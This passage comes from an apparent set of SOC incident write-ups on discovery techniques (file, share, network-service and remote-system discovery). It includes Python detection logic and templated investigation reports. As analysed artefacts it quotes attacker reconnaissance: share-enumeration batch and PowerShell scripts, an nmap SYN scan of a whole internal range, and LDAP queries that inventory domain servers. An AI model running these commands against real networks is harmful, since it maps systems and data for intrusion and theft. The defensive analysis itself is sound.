Access spans multiple shares (Finance, HR, Executive, IT, R&D, Legal)
User bturner normally only accesses Finance share
Process: Windows Explorer + custom script (cmd.exe with dir commands)
Pattern matches data harvesting for exfiltration
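The rate, spread and file-type conditions in the detection logic above can be reproduced over per-file access events. The following is an added example, not Varonis's rule and not code from this page: it finds the densest 15-minute window of file touches for a user, compares the count with the user's normal daily volume, lists the shares in that window that fall outside the user's habitual set, and pulls out credential stores (KeePass .kdbx and the like) because their presence changes the severity. The per-user baseline, thresholds, credential-file patterns and the constructed sample events (which reuse the alert's per-share counts) are assumptions.

```python
from __future__ import annotations

import ntpath
from collections import Counter
from datetime import datetime, timedelta

# Assumed per-user baseline: normal daily file touches and habitual shares
# (in practice learned from weeks of access history).
BASELINE = {"bturner": {"files_per_day": 100, "shares": {"finance"}}}
WINDOW = timedelta(minutes=15)
RATE_MULTIPLIER = 10          # alert when one window exceeds N times a normal day
CREDENTIAL_EXTENSIONS = {".kdbx", ".psafe3", ".ppk", ".pem"}
CREDENTIAL_NAMES = {"passwords.txt", "creds.txt"}


def share_of(unc_path: str) -> str:
    """Second UNC component: \\\\filesrv\\hr\\payroll\\x.xlsx -> 'hr'."""
    parts = unc_path.lstrip("\\").split("\\")
    return parts[1].lower() if len(parts) > 1 else ""


def is_credential_store(unc_path: str) -> bool:
    name = ntpath.basename(unc_path).lower()
    return name in CREDENTIAL_NAMES or ntpath.splitext(name)[1] in CREDENTIAL_EXTENSIONS


def analyse(user: str, events: list[tuple[datetime, str]]) -> dict | None:
    """events: (timestamp, UNC path) pairs. Returns a finding or None."""
    events = sorted(events)
    base = BASELINE.get(user, {"files_per_day": 100, "shares": set()})
    # densest 15-minute window, via a sliding window over the sorted events
    best, start, span = 0, 0, (0, 0)
    for end in range(len(events)):
        while events[end][0] - events[start][0] > WINDOW:
            start += 1
        if end - start + 1 > best:
            best, span = end - start + 1, (start, end)
    if best <= RATE_MULTIPLIER * base["files_per_day"]:
        return None
    window = [p for _, p in events[span[0]:span[1] + 1]]
    shares = Counter(share_of(p) for p in window)
    new_shares = set(shares) - set(base["shares"])
    cred = [p for p in window if is_credential_store(p)]
    return {
        "user": user,
        "files_in_window": best,
        "multiple_of_daily_norm": best / base["files_per_day"],
        "shares": dict(shares),
        "shares_outside_baseline": new_shares,
        "credential_stores": cred,
        # spread into shares the user never uses is the harvesting signal; a
        # credential store in the set is what makes it a drop-everything case
        "severity": "critical" if cred else "high" if new_shares else "medium",
    }


def _make_events() -> list[tuple[datetime, str]]:
    """Constructed sample spread evenly over 14:00-14:15 using the alert's
    per-share counts (3,733 files), with 3 KeePass files and passwords.txt
    placed on the IT share."""
    counts = [("finance", 2644), ("hr", 234), ("executive", 87), ("it", 12),
              ("r&d", 567), ("legal", 189)]
    paths = []
    for share, n in counts:
        for i in range(n):
            if share == "it" and i < 3:
                name = f"vault{i}.kdbx"
            elif share == "it" and i == 3:
                name = "passwords.txt"
            else:
                name = f"doc{i}.xlsx"
            paths.append(f"\\\\filesrv\\{share}\\{name}")
    t0 = datetime(2024, 2, 24, 14, 0)
    return [(t0 + timedelta(seconds=900 * i / len(paths)), p) for i, p in enumerate(paths)]


SAMPLE_EVENTS = _make_events()
# ordinary day for comparison: 40 finance files spread over 8 hours
BENIGN_EVENTS = [(datetime(2024, 2, 23, 9, 0) + timedelta(minutes=12 * i), f"\\\\filesrv\\finance\\q{i}.xlsx")
                 for i in range(40)]

if __name__ == "__main__":
    print(analyse("bturner", SAMPLE_EVENTS))
    print(analyse("bturner", BENIGN_EVENTS))
```

Keying the baseline on the share rather than the full folder keeps a finance user's normal wandering inside \\filesrv\finance quiet while still flagging the first touch of hr, executive or it.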
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify Varonis alert | Varonis Console | Confirmed mass file enumeration |
| 2. Process Investigation | Identify process on FIN-WS-078 | CrowdStrike Falcon | Found dir_scan.bat script enumerating shares |
| 3. Immediate Action | Isolate host | CrowdStrike | FIN-WS-078 quarantined |
| 4. Script Analysis | Analyze dir_scan.bat | Manual review | Script automates directory listing of all shares |
| 5. User Interview | Contact bturner | Teams, Phone | User did NOT run this script (account compromised) |
| 6. Account Remediation | Reset password, disable account | Azure AD, AD | bturner account disabled |
Jira Incident Report
Ticket: SOC-2024-122
Summary: T1083 – Mass File Enumeration Across Multiple Shares
Status: RESOLVED
Resolution: MALICIOUS – Account Compromised
Priority: P2 – MEDIUM
Labels: T1083, file-discovery, enumeration, varonis, compromised-account
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Enumeration – Potential Data Harvesting”.
User: bturner@company.com (Finance Department).
Source Host: FIN-WS-078.
Time: 2024-02-24 14:15 EST.
Technique: MITRE ATT&CK T1083 – File and Directory Discovery.
2. Technical Analysis:
Attack Chain:
13:45 – bturner account credentials compromised via phishing
13:50 – Attacker logs into FIN-WS-078 via RDP
13:55 – Attacker creates dir_scan.bat script
14:00-14:15 – Script enumerates files across all network shares
14:15 – Varonis detects anomaly
14:17 – SOC investigates
Script Analysis:
File: C:\Users\bturner\Desktop\dir_scan.bat
Content:
```batch
@echo off
rem recursive (/s) wide-format (/w) listing of each share, redirected to a local inventory file
dir \\filesrv\finance\*.* /s /w > C:\temp\finance.txt
dir \\filesrv\hr\*.* /s /w > C:\temp\hr.txt
dir \\filesrv\executive\*.* /s /w > C:\temp\exec.txt
dir \\filesrv\it\*.* /s /w > C:\temp\it.txt
rem "&" is a command separator in cmd.exe, so the r&d path must be quoted or the line splits into two commands
dir "\\filesrv\r&d\*.*" /s /w > C:\temp\rd.txt
dir \\filesrv\legal\*.* /s /w > C:\temp\legal.txt
dir \\filesrv\shared\*.* /s /w > C:\temp\shared.txt
```
Purpose: Create inventory of all files on network shares
Files of Critical Interest:
IT Share: passwords.txt (plaintext service account passwords)
IT Share: network_diagrams.pdf (infrastructure details)
Executive Share: board_meeting_minutes_q1.docx (confidential)
R&D Share: source_code_backup.zip (intellectual property)
Legal Share: contracts_with_vendors.xlsx (financial agreements)
Attacker Actions After Enumeration:
Created inventory files in C:\temp
No exfiltration observed; the activity was detected before any copy-out
Preparing for data theft
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – RDP access
13:55 – Script created
14:00-14:15 – Enumeration
14:15 – Varonis alert
14:17 – SOC investigates
14:20 – Host isolated
14:21 – Account disabled
14:22 – RDP session terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Desktop\dir_scan.bat
– C:\temp\*.txt (inventory files)
Account:
– bturner (compromised)
Network:
– Attacker RDP IP: 45.134.225[.]78
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Disabled bturner account.
Terminated RDP session.
Deleted dir_scan.bat and inventory files.
Data Protection:
Reviewed sensitive files accessed.
No exfiltration detected (DLP logs).
Rotated passwords exposed in IT share.
User Remediation:
bturner password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on finance account.
RDP allowed from internet.
Sensitive files accessible to finance user (over-privileged).
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: Sensitive file inventory created but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Sensitive files secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted file share permissions (least privilege).
Enhanced Varonis monitoring for enumeration patterns.
8. Conclusion:
An attacker compromised a finance user’s account and performed mass file enumeration across multiple network shares, creating an inventory of sensitive files. Varonis detected the anomalous access pattern before exfiltration could occur.
Closure Rationale: Account secured; enumeration stopped; data contained.
Analyst: [Walter White], SOC Analyst Date: 2024-02-24 15:30 EST
83. T1046 – Network Service Discovery (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-SERVICE-SCAN-1046-7842
Alert Time: 2024-02-24 11:30:22 EST
Severity: MEDIUM (72/100)
Source: ExtraHop Reveal(x)
Rule: “Internal Port Scan – Horizontal Movement Detected”
MITRE ATT&CK: T1046 – Network Service Discovery
Alert Details:
Detection: Horizontal port scan originating from internal host
Source Host: 192.168.45.78 (DEV-WS-045 – Engineering)
Time Window: 11:15-11:30 EST
Scan Pattern: TCP SYN scan across multiple subnets
Scan Details:
Target Range: 192.168.0.0/16 (entire internal network)
Ports Scanned: 22 (SSH), 80 (HTTP), 443 (HTTPS), 445 (SMB), 3389 (RDP), 3306 (MySQL), 5432 (PostgreSQL), 8080 (HTTP-Alt), 8443 (HTTPS-Alt)
Total Packets: 12,847
Unique Targets: 847 hosts
Successful Connections: 124 hosts (responded to scan)
Discovered Services:
SSH (22): 47 hosts (including 12 Linux servers)
SMB (445): 89 hosts (file servers, workstations)
RDP (3389): 34 hosts (potential lateral movement targets)
MySQL (3306): 12 hosts (database servers)
PostgreSQL (5432): 8 hosts
HTTP/HTTPS: 56 hosts
Detection Logic:
12,847 SYN packets in 15 minutes (anomalous for this host)
Sequential scanning pattern (nmap/masscan)
Host DEV-WS-045 normally generates minimal network traffic
Process: cmd.exe launching nmap (from EDR logs)
Pattern matches adversary lateral movement preparation
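The fan-out, low-response and sequential-target signals in the detection logic above can be computed from flow records without any packet capture. The following is an added example, not ExtraHop's detection and not code from this page: it takes SYN-only flows to internal addresses, groups them by source, and reports a source that probed many distinct hosts on a small fixed port set where most targets never answered; it also separates SYN-ACK replies (open service) from RST replies (host up, port closed) so the finding lists what the scanner actually learned. The thresholds, the flow record shape and the constructed sample (which reuses the alert's host and service counts) are assumptions.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("192.168.0.0/16")
FANOUT_THRESHOLD = 50      # distinct internal hosts one source probed (assumed)
MAX_RESPONSE_RATIO = 0.5   # a scan mostly hits hosts that never answer


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    flags: str          # TCP flags sent by src; "S" = bare SYN
    reply: str | None   # flags sent back: "SA" open, "RA" closed, None no answer


def scan_findings(flows: list[Flow]) -> dict:
    """Per-source fan-out analysis over SYN-only flows to internal addresses.

    A scan shows as one source touching many hosts on a small fixed port set
    where most targets never reply; sequential_ratio near 1.0 means the
    targets were walked in address order, as nmap and masscan do by default."""
    per_src: dict = defaultdict(list)
    for f in flows:
        if f.flags == "S" and ip_address(f.dst) in INTERNAL:
            per_src[f.src].append(f)
    findings = {}
    for src, fl in per_src.items():
        targets = {f.dst for f in fl}
        if len(targets) < FANOUT_THRESHOLD:
            continue
        responders = {f.dst for f in fl if f.reply}
        if len(responders) / len(targets) > MAX_RESPONSE_RATIO:
            continue
        open_by_port: dict = defaultdict(set)
        for f in fl:
            if f.reply == "SA":
                open_by_port[f.dport].add(f.dst)
        ordered = sorted(int(ip_address(t)) for t in targets)
        sequential = sum(1 for a, b in zip(ordered, ordered[1:]) if b - a == 1)
        findings[src] = {
            "syn_count": len(fl),
            "targets": len(targets),
            "responders": len(responders),
            "ports": sorted({f.dport for f in fl}),
            "open_services": {p: len(h) for p, h in sorted(open_by_port.items())},
            "sequential_ratio": sequential / max(1, len(ordered) - 1),
        }
    return findings


def _make_flows() -> list[Flow]:
    """Constructed sample mirroring the alert: DEV-WS-045 walks 847 addresses
    upward from 192.168.1.1 on 9 ports; 124 hosts answer and the open-port
    counts follow the alert's service table; plus a benign file-server session."""
    ports = [22, 80, 443, 445, 3389, 3306, 5432, 8080, 8443]
    open_counts = {22: 47, 445: 89, 3389: 34, 3306: 12, 5432: 8, 80: 28, 443: 28}
    first = int(ip_address("192.168.1.1"))
    flows = []
    for i in range(847):
        dst = str(ip_address(first + i))
        for p in ports:
            if i >= 124:
                reply = None          # host down or filtered
            elif i < open_counts.get(p, 0):
                reply = "SA"          # open service
            else:
                reply = "RA"          # host up, port closed
            flows.append(Flow("192.168.45.78", dst, p, "S", reply))
    flows += [Flow("192.168.45.80", "192.168.10.5", 445, "S", "SA") for _ in range(5)]
    return flows


SAMPLE_FLOWS = _make_flows()

if __name__ == "__main__":
    for src, f in scan_findings(SAMPLE_FLOWS).items():
        print(src, f)
```

The response-ratio guard is what keeps a busy build server or a monitoring poller, which talks to many hosts that all answer, out of the finding list; a scanner of a /16 gets silence from most of the range.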
SOC Investigation Process
| Step | Action | Tools Used | Findings |
| --- | --- | --- | --- |
| 1. Alert Validation | Verify ExtraHop alert | ExtraHop Console | Confirmed internal port scan |
| 2. Process Investigation | Identify scanning process | CrowdStrike Falcon | nmap.exe running, installed from an installer in the user’s Downloads folder |
| 3. User Interview | Contact dev user | Teams, Phone | User claims “security research”; not authorized |
| 4. Immediate Action | Isolate host | CrowdStrike | DEV-WS-045 quarantined |
| 5. Tool Removal | Delete nmap | CrowdStrike Live Response | nmap.exe and scan results removed |
| 6. User Remediation | User counseling | Manager, HR | Policy violation documented |
Jira Incident Report
Ticket: SOC-2024-123
Summary: T1046 – Internal Network Service Scan from Engineering Workstation
Status: RESOLVED
Resolution: POLICY VIOLATION – Unauthorized Scanning
Priority: P3 – LOW
Labels: T1046, service-discovery, port-scan, extrahop, policy-violation
Components: Network-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Internal Port Scan – Horizontal Movement Detected”.
Source Host: DEV-WS-045 (Engineering Department, IP 192.168.45.78).
Time: 2024-02-24 11:30 EST.
Technique: MITRE ATT&CK T1046 – Network Service Discovery.
2. Technical Analysis:
Scan Details:
Tool: nmap.exe (version 7.94)
Command: nmap -sS -p 22,80,443,445,3389,3306,5432,8080,8443 192.168.0.0/16
Duration: 15 minutes
Packets: 12,847
Targets: 847 hosts
Successes: 124 responsive hosts
Discovered Services:
SSH (22): 47 hosts (including 12 Linux servers)
SMB (445): 89 hosts (file servers, workstations)
RDP (3389): 34 hosts (potential lateral movement targets)
MySQL (3306): 12 hosts (database servers)
PostgreSQL (5432): 8 hosts
HTTP/HTTPS: 56 hosts
User Intent:
User claimed “researching network security for a presentation”
No malicious intent identified
No authorization obtained for scanning
Scan results saved to C:\Users\devuser\Desktop\scan_results.txt
Policy Violation:
Unauthorized network scanning (violates Acceptable Use Policy)
Use of prohibited tools (nmap)
Discovery of internal services could aid attackers
3. Investigation Findings:
Timeline:
11:15-11:30 – Scan performed
11:30 – ExtraHop alert
11:32 – SOC investigates
11:35 – Host isolated
11:38 – nmap identified and removed
11:40 – User interview
Indicators of Compromise (IoCs):
Files:
– C:\Users\devuser\Downloads\nmap-7.94-setup.exe
– C:\Program Files (x86)\Nmap\nmap.exe
– C:\Users\devuser\Desktop\scan_results.txt
Network:
– Scan pattern to ports 22,80,443,445,3389,3306,5432,8080,8443
4. Containment Actions:
Immediate Actions:
Isolated DEV-WS-045 via CrowdStrike.
Removed nmap and scan results.
No further action needed (non-malicious).
User Remediation:
User counseled on policy violation.
Required to complete security training.
Documentation sent to manager.
Network Impact:
Scan caused no service disruption.
Discovered services documented for security team.
5. Root Cause Analysis:
Primary Cause: User conducted unauthorized network scanning.
Contributing Factors:
No application control blocking nmap.
User unaware of scanning policy.
Curiosity about network security.
6. Business Impact:
Operational Impact: None.
Security Impact: Internal service inventory exposed to user (already had access).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
nmap removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for nmap execution.
Enhanced network scanning detection.
Blocked nmap via application control.
8. Conclusion:
An engineer conducted unauthorized network scanning using nmap, discovering 124 internal hosts and their services. ExtraHop detected the scan pattern, enabling identification and removal of the tool. The activity was a policy violation, not malicious.
Closure Rationale: nmap removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-24 12:30 EST
84. T1135 – Network Share Discovery (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SHARE-DISCOVERY-1135-7842
Alert Time: 2024-02-24 16:30:45 EST
Severity: MEDIUM (68/100)
Source: Splunk Enterprise Security
Rule: “Multiple Network Share Enumeration Attempts”
MITRE ATT&CK: T1135 – Network Share Discovery
Alert Details:
Correlated Events:
Windows Event ID 5140 (Network Share Object Accessed):
Time: 16:15-16:30 EST
Source Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (HR Generalist)
Target: \\filesrv (multiple shares)
Events: 47 share access attempts
Shares Accessed:
\\filesrv\finance – accessed (unusual for HR)
\\filesrv\it – accessed
\\filesrv\executive – accessed
\\filesrv\r&d – accessed
\\filesrv\legal – accessed
\\filesrv\hr – accessed (normal)
\\filesrv\shared – accessed
\\filesrv\backups – accessed
Process Creation (Event ID 4688):
Time: 16:14 EST
Process: cmd.exe
Command: net view \\filesrv /all
Command: dir \\filesrv\*.* /s
Event ID 5145 (Share Access):
Time: 16:15-16:30
Detailed access to subfolders within shares
Detection Logic:
User kwilson (HR) accessing finance, IT, R&D shares (anomalous)
47 share access events in 15 minutes (high volume)
net view command executed (share discovery tool)
Pattern matches lateral movement reconnaissance
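The Splunk correlation described above, reworked as an added example rather than the rule from the report: Python that scores each user's Event 5140 activity on three signals, the event volume inside a 15-minute window, shares outside a constructed department-to-share baseline, and a preceding Event 4688 discovery command such as net view. The baseline, thresholds, host names and sample events are assumptions.

```python
"""Network share discovery scoring over Windows Security events (T1135), added example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed baseline of the shares each department normally touches. In production
# this is learned from weeks of Event 5140 history rather than hand-written.
DEPT_BASELINE = {
    "HR": {"hr", "shared"},
    "Finance": {"finance", "shared"},
}
DISCOVERY_CMDS = ("net view", "net share", "get-smbshare", "win32_share")
WINDOW = timedelta(minutes=15)
VOLUME_THRESHOLD = 20       # Event 5140 records from one user inside a window


def share_name(raw):
    r"""Event 5140 reports the share as \\*\finance; return the bare name."""
    return raw.rsplit("\\", 1)[-1].lower()


def build_sample_events():
    """Constructed events: kwilson (HR) runs net view, then touches eight shares 47
    times in 15 minutes; jsmith (Finance) opens finance/shared files all afternoon."""
    t0 = datetime(2024, 2, 24, 16, 14)
    events = [{"id": 4688, "ts": t0, "user": "kwilson", "dept": "HR", "host": "HR-WS-023",
               "cmdline": "net view \\\\filesrv /all"}]
    shares = ["finance", "it", "executive", "r&d", "legal", "hr", "shared", "backups"]
    for k in range(47):
        events.append({"id": 5140, "ts": t0 + timedelta(minutes=1, seconds=19 * k),
                       "user": "kwilson", "dept": "HR", "host": "HR-WS-023",
                       "share": "\\\\*\\" + shares[k % 8]})
    for k in range(6):
        events.append({"id": 5140, "ts": t0 + timedelta(minutes=20 * k),
                       "user": "jsmith", "dept": "Finance", "host": "FIN-WS-012",
                       "share": "\\\\*\\" + ("finance" if k % 2 else "shared")})
    return events


def detect_share_discovery(events):
    """Score each user's Event 5140 activity in 15-minute windows on three signals:
    volume, shares outside the department baseline, and a discovery command
    (Event 4688) run shortly before. Two or more signals make a finding."""
    per_user = defaultdict(list)
    for e in events:
        per_user[e["user"]].append(e)
    findings = {}
    for user, evs in per_user.items():
        accesses = sorted((e for e in evs if e["id"] == 5140), key=lambda e: e["ts"])
        cmds = [e for e in evs if e["id"] == 4688
                and any(c in e["cmdline"].lower() for c in DISCOVERY_CMDS)]
        for first in accesses:
            end = first["ts"] + WINDOW
            window = [e for e in accesses if first["ts"] <= e["ts"] <= end]
            foreign = ({share_name(e["share"]) for e in window}
                       - DEPT_BASELINE.get(first["dept"], set()))
            preceded = any(first["ts"] - timedelta(minutes=5) <= c["ts"] <= end for c in cmds)
            reasons = []
            if len(window) >= VOLUME_THRESHOLD:
                reasons.append(f"{len(window)} share-access events in 15 min")
            if foreign:
                reasons.append("shares outside department baseline: " + ", ".join(sorted(foreign)))
            if preceded:
                reasons.append("share discovery command ran shortly before")
            if len(reasons) >= 2:
                findings[user] = {"host": first["host"], "events": len(window),
                                  "foreign_shares": sorted(foreign),
                                  "discovery_cmd": preceded, "reasons": reasons}
                break       # one finding per user; later windows are the same activity
    return findings


if __name__ == "__main__":
    for user, finding in detect_share_discovery(build_sample_events()).items():
        print(user, finding)
```

Requiring two signals is what keeps a Finance user opening many finance files, or an administrator running net share for legitimate reasons, out of the queue.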
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed network share discovery |
| 2. Process Investigation | Identify process on HR-WS-023 | CrowdStrike Falcon | Found PowerShell script enumerating shares |
| 3. User Interview | Contact kwilson | Teams, Phone | User did NOT perform this activity |
| 4. Immediate Action | Isolate host | CrowdStrike | HR-WS-023 quarantined |
| 5. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled |
| 6. Threat Hunting | Check for similar activity | Splunk, CrowdStrike | No other hosts affected |
Jira Incident Report
Ticket: SOC-2024-124
Summary: T1135 – Network Share Discovery from HR Workstation
Status: RESOLVED
Resolution: MALICIOUS – Account Compromised
Priority: P2 – MEDIUM
Labels: T1135, share-discovery, network-shares, splunk, compromised-account
Components: Data-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Multiple Network Share Enumeration Attempts”.
Source Host: HR-WS-023 (HR Department).
User: kwilson@company.com (HR Generalist).
Time: 2024-02-24 16:30 EST.
Technique: MITRE ATT&CK T1135 – Network Share Discovery.
2. Technical Analysis:
Attack Chain:
15:45 – kwilson account credentials compromised (phishing)
15:50 – Attacker logs into HR-WS-023 via RDP
16:00 – Attacker runs PowerShell script for share discovery
16:05-16:30 – Script enumerates all network shares
16:30 – Splunk detects anomaly
Script Analysis:
File: C:\Users\kwilson\AppData\Local\Temp\enum.ps1
Content:
```powershell
$shares = net view \\filesrv /all
foreach ($share in $shares) {
    $path = "\\filesrv\" + $share
    dir $path -Recurse -ErrorAction SilentlyContinue
    $path >> C:\temp\share_contents.txt
}
```
Purpose: Enumerate all shares and list their contents
Shares Discovered:
Finance: 1,247 files (financial reports, budgets)
IT: 3,456 files (network diagrams, passwords, configs)
Executive: 234 files (board minutes, strategy docs)
R&D: 5,678 files (source code, designs)
Legal: 892 files (contracts, IP documents)
HR: 1,234 files (employee records, salaries)
Backups: 12,345 files (full system backups)
Attacker Actions After Discovery:
Created inventory file (C:\temp\share_contents.txt)
No exfiltration yet (detected before)
Preparing for data theft
3. Investigation Findings:
Timeline:
15:45 – Credentials compromised
15:50 – RDP access
16:00-16:30 – Share enumeration
16:30 – Splunk alert
16:32 – SOC investigates
16:35 – Host isolated
16:36 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\enum.ps1
– C:\temp\share_contents.txt
Account:
– kwilson (compromised)
Network:
– Attacker RDP IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated HR-WS-023 via CrowdStrike.
Disabled kwilson account.
Terminated RDP session.
Deleted enum.ps1 and share_contents.txt.
Data Protection:
Reviewed sensitive files discovered.
No exfiltration detected (DLP logs).
Rotated any exposed credentials.
User Remediation:
kwilson password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on HR account.
RDP allowed from internet.
HR account had broad access to network shares (over-privileged).
6. Business Impact:
Operational Impact: HR user offline for 2 hours.
Data Exposure: Full share inventory created but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Share inventory deleted.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted share permissions (least privilege).
Enhanced monitoring for share enumeration.
8. Conclusion:
An attacker compromised an HR user’s account and performed comprehensive network share discovery, creating an inventory of sensitive files across multiple departments. Splunk detected the anomalous access pattern before exfiltration could occur.
Closure Rationale: Account secured; enumeration stopped; data contained.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-24 17:30 EST
85. T1018 – Remote System Discovery (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-REMOTE-DISCOVERY-1018-7842
Alert Time: 2024-02-24 10:30:22 EST
Severity: MEDIUM (72/100)
Source: Darktrace Enterprise Immune System
Rule: “LDAP Query Anomaly – Potential Domain Reconnaissance”
MITRE ATT&CK: T1018 – Remote System Discovery
Alert Details:
Detection: Unusual volume of LDAP queries from single host
Source Host: 192.168.45.78 (ENG-WS-045 – Engineering)
Time: 10:15-10:30 EST
LDAP Queries: 1,247 in 15 minutes (normal is 10-20)
Query Patterns:
10:15:15 – Query: (objectClass=computer) – list all computers
10:15:45 – Query: (&(objectClass=computer)(operatingSystem=server)) – find servers
10:16:12 – Query: (&(objectClass=computer)(operatingSystem=domain controller)) – find DCs
10:16:38 – Query: (cn=sql) – find SQL servers
10:17:05 – Query: (cn=exchange) – find Exchange servers
10:17:33 – Query: (cn=filesrv) – find file servers
10:18:01 – Query: (cn=print) – find print servers
10:18:28 – Query: (cn=vcenter) – find vCenter servers
10:19:15 – Query: (cn=esxi) – find ESXi hosts
(continuing with various system naming patterns)
Results Discovered:
Total Computers: 3,247
Domain Controllers: 4
SQL Servers: 23
Exchange Servers: 2
File Servers: 47
Print Servers: 12
Virtualization Hosts: 8
Detection Logic:
1,247 LDAP queries in 15 minutes (highly anomalous)
Process: powershell.exe (using ADSI)
Query patterns targeting specific system types
Pattern matches adversary remote system discovery
Additional Context:
Host ENG-WS-045 is engineering workstation
User: alexchen (engineer)
No legitimate reason for LDAP reconnaissance
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Darktrace alert | Darktrace Console | Confirmed LDAP reconnaissance |
| 2. Process Investigation | Identify PowerShell script | CrowdStrike Falcon | Found Active Directory reconnaissance script |
| 3. User Interview | Contact alexchen | Teams, Phone | User claims “learning PowerShell” – unauthorized |
| 4. Immediate Action | Isolate host temporarily | CrowdStrike | ENG-WS-045 isolated |
| 5. Script Removal | Delete reconnaissance script | CrowdStrike Live Response | Script removed from Downloads folder |
| 6. User Remediation | User counseling | Manager, HR | Policy violation documented |
Jira Incident Report
Ticket: SOC-2024-125
Summary: T1018 – LDAP Reconnaissance for Remote System Discovery
Status: RESOLVED
Resolution: POLICY VIOLATION – Unauthorized Reconnaissance
Priority: P3 – LOW
Labels: T1018, remote-discovery, ldap, darktrace, policy-violation
Components: Identity-Monitoring, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “LDAP Query Anomaly – Potential Domain Reconnaissance”.
Source Host: ENG-WS-045 (Engineering Department, IP 192.168.45.78).
User: alexchen@company.com (Engineer).
Time: 2024-02-24 10:30 EST.
Technique: MITRE ATT&CK T1018 – Remote System Discovery.
2. Technical Analysis:
Reconnaissance Details:
Tool: PowerShell script using ADSI (Active Directory Service Interfaces)
Commands:
```powershell
$searcher = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://company.com")
$searcher.PageSize = 1000
# Find all computers
$searcher.Filter = "(objectClass=computer)"
$computers = $searcher.FindAll()
# Find servers by OS
$searcher.Filter = "(&(objectClass=computer)(operatingSystem=*server*))"
$servers = $searcher.FindAll()
# Find specific systems
$sqlServers = Get-ADComputer -Filter {Name -like "*sql*"}
$exchangeServers = Get-ADComputer -Filter {Name -like "*exchange*"}
# … and so on
```
Purpose: Comprehensive inventory of all systems in domain
Systems Discovered:
Total Computers: 3,247 (all workstations, servers)
Domain Controllers: 4 (critical infrastructure)
SQL Servers: 23 (database servers)
Exchange Servers: 2 (email servers)
File Servers: 47 (data storage)
Virtualization Hosts: 8 (VMware ESXi)
User Intent:
User claimed “learning PowerShell for automation”
No malicious intent identified
No authorization for domain-wide reconnaissance
Results saved to C:\Users\alexchen\Desktop\systems.txt
Policy Violation:
Unauthorized domain reconnaissance
Use of discovery techniques without approval
Discovery of critical systems could aid attackers
3. Investigation Findings:
Timeline:
10:15-10:30 – Reconnaissance performed
10:30 – Darktrace alert
10:32 – SOC investigates
10:35 – Host isolated
10:38 – Script identified and removed
10:40 – User interview
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\ad_recon.ps1
– C:\Users\alexchen\Desktop\systems.txt
LDAP:
– 1,247 queries in 15 minutes
– Patterns: *server*, *sql*, *exchange*, *dc*, *filesrv*
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 temporarily.
Removed ad_recon.ps1 and systems.txt.
No further action needed (non-malicious).
User Remediation:
User counseled on policy violation.
Required to complete security training.
Documentation sent to manager.
Network Impact:
LDAP queries caused no performance issues.
Discovery data documented for security awareness.
5. Root Cause Analysis:
Primary Cause: User conducted unauthorized domain reconnaissance.
Contributing Factors:
No restrictions on LDAP queries.
User unaware of reconnaissance policy.
Curiosity about Active Directory.
6. Business Impact:
Operational Impact: None.
Security Impact: System inventory exposed to user (already had legitimate access).
Policy Impact: Policy violation documented.
7. Remediation & Prevention:
Completed Actions:
Reconnaissance script removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for high-volume LDAP queries.
Enhanced monitoring for AD reconnaissance.
Implemented application control for unauthorized scripts.
8. Conclusion:
An engineer conducted unauthorized LDAP reconnaissance to discover all systems in the domain, including critical infrastructure. Darktrace detected the anomalous query volume, enabling identification and removal of the script. The activity was a policy violation, not malicious.
Closure Rationale: Script removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-24 11:30 EST
Batch 18: Discovery & Lateral Movement Incident Reports
86. T1082 – System Information Discovery (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SYSINFO-1082-7842
Alert Time: 2024-02-25 09:30:15 EST
Severity: MEDIUM (72/100)
Source: CrowdStrike Falcon EDR
Rule: “System Information Discovery – Reconnaissance Commands”
MITRE ATT&CK: T1082 – System Information Discovery
Alert Details:
